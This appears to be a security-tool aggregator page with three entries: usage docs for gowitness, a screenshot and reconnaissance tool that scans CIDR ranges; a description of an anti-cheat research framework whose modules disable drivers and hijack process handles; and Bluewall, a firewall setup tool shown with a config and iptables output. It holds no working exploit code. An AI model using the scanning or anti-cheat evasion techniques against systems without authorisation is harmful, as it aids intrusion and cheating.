For any other commands, you can get help similar to the local binary install. For example:
docker run --rm -it -v $(pwd)/screenshots:/screenshots leonjza/gowitness:latest -h
A commandline web screenshot and information gathering tool by @leonjza

Usage:
  gowitness [command]

Available Commands:
  file        Screenshot URLs sourced from a file
  help        Help about any command
  nmap        Screenshot services from an Nmap XML file
  report      Work with gowitness reports
  scan        Scan a CIDR range and take screenshots along the way
  single      Take a screenshot of a single URL
  version     Prints the version of gowitness

Build from source
To build gowitness from source, follow the following steps:
  • Ensure that you have at least golang version 1.13.
  • Clone this repository and cd into it.
  • Run go build to get the gowitness binary for the current machine.
  • Or, make to build for all targets. Binaries will be in the build/ diretory.

Usage examples

Screenshot a single website
$ gowitness single --url=https://www.google.com/
This should result in a file being created called: https-www.google.com.png

Screenshot a cidr
$ gowitness scan --cidr 192.168.0.0/24 --threads 20
This should result in many .png images in the current directory when complete. This can would also use 20 threads and not the default of 4.

Generate a report
$ gowitness report generate
This should result in an report.html file with a screenshot report.
$ gowitness report generate --sort-perception
This should result in an report.html file with a screenshot report where screenshots are sorted using perception hashing.
$ gowitness report list
This should list the entries in the gowitness.db file.


AntiCheat-Testing-Framework - Framework To Test Any Anti-Cheat

January 17, 2020, 12:30 pm
$
0
0

Framework to test any Anti-Cheat on the market. This can be used as Template or Code Base to test any Anti-Cheat and learn along the way. The entry level to reverse AntiCheats and Cheats is quite high, therefore, I'm realeasing all the code I developed during my research. The main idea is to help people and motive them to get into this topic which is really interesting and there is a lot to research about it.
All this code is the result of a research done for Recon2019 (Montreal) and BlackHat Europe 2019 (London).

Twitter: @Niemand_sec
More info: Personal Blog
  • Description for each module can be found on each folder.
  • Modules can be used together or separated.
  • Cuztomization should be simple due to the modularity of the code.

Usage
Most of the settings can be done by using config.ini file, however, some modules may require particular settings on the code, depending on your intentions.
Remember to change location of config.ini file at CheatHelper/CheatHelper.cpp (variable configFile)

Modules (more coming in the future)
  • CheatHelper
  • DriverDisabler
  • DriverHelper
  • DriverTester
  • HandleElevationDriver
  • HandleHijackingDLL
  • HandleHijackingMaster
  • LuaHook
  • StealthHijackingNormalDLL
  • StealthHijackingNormalMaster

About this Project
All this code is a result of the Researching presented at Recon 2019 and BlackHat Europe 2019: "Unveiling the underground world of Anti-Cheats"
Links:


Bluewall - A Firewall Framework Designed For Offensive And Defensive Cyber Professionals

January 18, 2020, 3:30 am
$
0
0

Bluewall is a firewall framework designed for offensive and defensive cyber professionals. This framework allows Cybersecurity professionals to quickly setup their environment while staying within their scope.

Credit
Inspired by Andrew Benson's hostfw iptable generation script.

Features

Bluewall
* Configure Firewall
* Configure Hostname
* Configure Interface(s)

Supported Operating Systems
* Redhat/CentOS
* Windows configuration can be generated but not executed.

Commandline
*  bluewall -c config/example.ini
** See example configuration

Utils
* Enumerate - Identify live hosts inside your network (coming soon)

Symantecs
* Target Host - Outbound communication
* Trusted Host - Bidirectional communication
* No Strike - Devices your computer should not communicate with

Setup
# BUILT FOR PYTHON 2.x
sudo python setup.py install
sudo bluewall -h (for help)

Getting Started
# Setup Initial Environment using Configuration
sudo bluewall -c config/hostconfig.ini

# Export optional windows configuration
sudo bluewall -c config/hostconfig.ini -w autoconfig.ps1

# Add additional inbound host or ranges
sudo bluewall -ih 192.168.0.3,192.168.1.0/24

# Exclude host to communicate with
sudo bluewall -eh 192.168.1.1

# Super easy wizard mode
sudo bluewall --wizard

Help
usage: bluewall [-h] [-V] [-v] [-r] [-p] [-i] [-d] [-w WINDOWS_CONFIG]
          [-ot TCP_PORTS_OUT] [-ou UDP_PORTS_OUT] [-it TCP_PORTS_IN]
          [-iu UDP_PORTS_IN] [-oh OUTBOUND_HOSTS] [-ih INBOUND_HOSTS]
          [-eh EXCLUDE_HOSTS] [-l] [-s] [-q] [-D] [-A] [-F] [-S] [-c CONFIG]
          [--info]

         /////////////////////////////////////////////////////
        |  _____ __    _____ _____ _ _ _ _____ __    __      |
        | |  __ |  |  |  |  |   __| | | |  -  |  |  |  |     |
        | |  __-|  |__|  |  |   __| | | |     |  |__|  |__   |
        | |_____|_____|_____|_____|_____|__|__|_____|_____|  |
        |                                                    |
         \\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
            A python framework to automate firewall setup.

        Defaults:
            Outbound connections will be allowed on all ports to all hosts.
            Inbou   nd connections will be limited to related outbound traffic.
            DHCP will be enabled.
            Ping responses will be enabled.
            Unsolicited inbound connections will be dropped.



optional arguments:
  -h, --help            show this help message and exit
  -V, --version         Display Version
  -v, --verbose         Verbose Mode
  -r, --reset           Send TCP RST instead of dropping packet.
  -p, --disallow_ping   Disallow incoming PING
  -i, --allow_outbound_icmp
                        Don't restrict ICMP types
  -d, --disallow_dhcp   Disallow DHCP
  -w WINDOWS_CONFIG, --windows_config WINDOWS_CONFIG
                        Generate Windows Configuration. Usage: bluewall -w
                        config.ps1
  -ot TCP_PORTS_OUT, --tcp_ports_out TCP_PORTS_OUT
                        Comma separated list of allowed TCP ports outbound
  -ou UDP_PORTS_OUT, --udp_ports_   out UDP_PORTS_OUT
                        Comma separated list of allowed UDP ports outbound
  -it TCP_PORTS_IN, --tcp_ports_in TCP_PORTS_IN
                        Comma separated list of allowed TCP ports inbound
  -iu UDP_PORTS_IN, --udp_ports_in UDP_PORTS_IN
                        Comma separated list of allowed UDP ports inbound
  -oh OUTBOUND_HOSTS, --outbound_hosts OUTBOUND_HOSTS
                        Restrict outbound to specified hosts. -oh
                        192.168.3.0/24,192.168.4.0/24
  -ih INBOUND_HOSTS, --inbound_hosts INBOUND_HOSTS
                        Restrict outbound to specified hosts. -ih
                        192.168.3.0/24,192.168.4.0/24
  -eh EXCLUDE_HOSTS, --exclude_hosts EXCLUDE_HOSTS
                        Exclude hosts -eh 192.168.3.0/24
  -l, --log_exceptions  Log Exceptions
  -s, --simulate        Simulate only.
  -q, --quiet           Quiet (don't display status messages
     -D, --deny_all        Absolute Deny all
  -A, --allow_all       Absolute allow all
  -F, --flush           Flush IPTables
  -S, --show_rules      Show rules after setting
  --wizard              Addressing and firewall wizard mode
  -c CONFIG, --config CONFIG
                        Configuration for firewall
  --info                About Bluewall

Config Example
example.ini
[local_config]
iface=em1
rh_host=RHEL-Example
rh_ipaddr=192.168.1.42
netmask=255.255.255.0
gateway_addr=172.16.63.1
dns=8.8.8.8
#win_ipaddr=192.168.1.42 - Optional windows IP Address
#
# Optional Windows host (Bluewall will generate a config file for windows)
win_host=WINExample
# MAC Addresses must be ALL CAPS Valid: AA:93:AB:EF:00:01
# rh_mac=* will generate random MAC address
rh_mac=*

[firewall_config]
# Target Range are networks you want to allow outbound communication with.
target_range=172.16.63.0/24
target_range=192.168.2.0/24
#
# Nostrike addresses are devices your computer should NOT communicate with
nostrike=192.168.2.1
#
# Trusted Range are networks you wish to have bi-directional communication with
trusted_range=172.16.63.0/24
trusted_host=42.42.42.42

Output
[ataylor@localhost bluewall]$ sudo bluewall -c configs/exampleconfig.ini 
[OK] 192.168.1.101 is a valid setting for dns
[OK] 192.168.1.1 is a valid setting for gateway_addr
[OK] 24 is a valid setting for cidr_prefix
[OK] 192.168.1.254 is a valid setting for nostrike
[OK] * is a valid setting for rh_mac
[OK] WINtaylor is a valid setting for win_host
[OK] 192.168.2.0/24 is a valid setting for target_range
[OK] 192.168.3.0/24 is a valid setting for target_range
[OK] 192.168.1.30 is a valid setting for rh_ipaddr
[OK] RHEL-taylor is a valid setting for rh_host
[OK] 42.42.42.42 is a valid setting for trusted_host
[OK] 192.168.1.0/24 is a valid setting for trusted_range
[OK] 192.168.1.50 is a valid setting for win_ipaddr
==============================

[VALID CONFIG] No Errors Detected.

CONFIGURING
writing eth config to /etc/sysconfig/network-scripts/ifcfg-ens33
[CONFIGURATION]
TYPE="Etherne   t"
BOOTPROTO=none
NAME=ens33
DEVICE="ens33"
ONBOOT=no
DEFROUTE="yes"
IPV4_FAILURE_FATAL=no
DNS1=192.168.1.101
IPADDR=192.168.1.30
PREFIX=24
GATEWAY=192.168.1.1
MACADDR=00:16:3E:52:7F:8D

[+] Interface ens33 shutdown.
[+] Restarting Network Service
[+] Interface ens33 brought up.
[+] Rules Flushed!
[+] Allowing outbound ICMP/traceroute to 192.168.2.0/24...
[+] Allowing outbound ICMP/traceroute to 192.168.3.0/24...
[+] Allowing outbound ICMP/traceroute to 192.168.1.0/24...
[+] Limiting outbound TCP connections to 192.168.2.0/24.
[+] Limiting outbound TCP connections to 192.168.3.0/24.
[+] Limiting outbound TCP connections to 192.168.1.0/24.
[+] Limiting outbound UDP connections to 192.168.2.0/24.
[+] Limiting outbound UDP connections to 192.168.3.0/24.
[+] Limiting outbound UDP connections to 192.168.1.0/24.
[+] Limiting inbound UDP connections to 192.168.1.0/24.
[+] Limiting in   bound TCP connections to 192.168.1.0/24.
[+] Allowing traffic for localhost.
[+] 192.168.1.254 applied to NOSTRIKE
$ iptables -nvL
Chain INPUT (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0 DROP       all  --  *      *       192.168.1.254        0.0.0.0/0           
    0     0 ACCEPT     all  --  *      *       127.0.0.0/8          127.0.0.0/8         
    0     0 ACCEPT     tcp  --  *      *       0.0.0.0/0            192.168.1.0/24      
    0     0 ACCEPT     udp  --  *      *       0.0.0.0/0            192.168.1.0/24      

Chain FORWARD (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
<   br/>Chain OUTPUT (policy DROP 0 packets, 0 bytes)
 pkts bytes target     prot opt in     out     source               destination         
    0     0 DROP       all  --  *      *       0.0.0.0/0            192.168.1.254       
    0     0 ACCEPT     all  --  *      *       127.0.0.0/8          127.0.0.0/8         
    0     0 ACCEPT     udp  --  *      *       0.0.0.0/0            192.168.1.0/24      
    0     0 ACCEPT     udp  --  *      *       0.0.0.0/0            192.168.3.0/24      
    0     0 ACCEPT     udp  --  *      *       0.0.0.0/0            192.168.2.0/24      
    0     0 ACCEPT     tcp  --  *      *       0.0.0.0/0            192.168.1.0/24      
    0     0 ACCEPT     tcp  --  *      *       0.0.0.0/0            192.168.3.0/24      
    0     0 ACCEPT     tcp  --  *      *       0.0.0.0/0            192.168.2.0/24      
    0     0 ACCEPT     icmp --  *      *       0.0.0.0/0            192.168.1.0/24       icmptype 0
       0     0 ACCEPT     icmp --  *      *       0.0.0.0/0            192.168.1.0/24       icmptype 8
    0     0 ACCEPT     icmp --  *      *       0.0.0.0/0            192.168.3.0/24       icmptype 0
    0     0 ACCEPT     icmp --  *      *       0.0.0.0/0            192.168.3.0/24       icmptype 8
    0     0 ACCEPT     icmp --  *      *       0.0.0.0/0            192.168.2.0/24       icmptype 0
    0     0 ACCEPT     icmp --  *      *       0.0.0.0/0            192.168.2.0/24       icmptype 8

[+] Setup Complete.


Viewing all 5840 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>